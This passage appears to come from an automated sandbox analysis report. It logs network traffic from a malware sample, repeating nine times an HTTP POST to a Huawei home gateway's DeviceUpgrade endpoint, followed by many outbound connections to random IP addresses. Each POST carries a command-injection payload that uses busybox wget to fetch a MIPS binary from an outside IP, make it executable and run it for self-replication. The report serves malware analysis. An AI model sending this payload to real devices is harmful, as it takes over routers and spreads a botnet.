          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
          Source: unknownTCP traffic detected without corresponding DNS query: 36.220.195.163
          Source: unknownTCP traffic detected without corresponding DNS query: 41.24.32.207
          Source: unknownTCP traffic detected without corresponding DNS query: 190.198.11.63
          Source: unknownTCP traffic detected without corresponding DNS query: 41.242.39.224
          Source: unknownTCP traffic detected without corresponding DNS query: 157.26.87.133
          Source: unknownTCP traffic detected without corresponding DNS query: 197.89.169.68
          Source: unknownTCP traffic detected without corresponding DNS query: 76.99.245.93
          Source: unknownTCP traffic detected without corresponding DNS query: 41.198.201.62
          Source: unknownTCP traffic detected without corresponding DNS query: 156.103.226.156
          Source: unknownTCP traffic detected without corresponding DNS query: 183.62.90.136
          Source: unknownTCP traffic detected without corresponding DNS query: 149.119.186.237
          Source: unknownTCP traffic detected without corresponding DNS query: 157.5.2.18
          Source: unknownTCP traffic detected without corresponding DNS query: 41.152.184.159
          Source: unknownTCP traffic detected without corresponding DNS query: 157.216.108.241
          Source: unknownTCP traffic detected without corresponding DNS query: 125.33.207.14
          Source: unknownTCP traffic detected without corresponding DNS query: 115.9.59.221
          Source: unknownTCP traffic detected without corresponding DNS query: 157.134.14.1
          Source: unknownTCP traffic detected without corresponding DNS query: 60.74.64.111
          Source: unknownTCP traffic detected without corresponding DNS query: 157.40.121.156
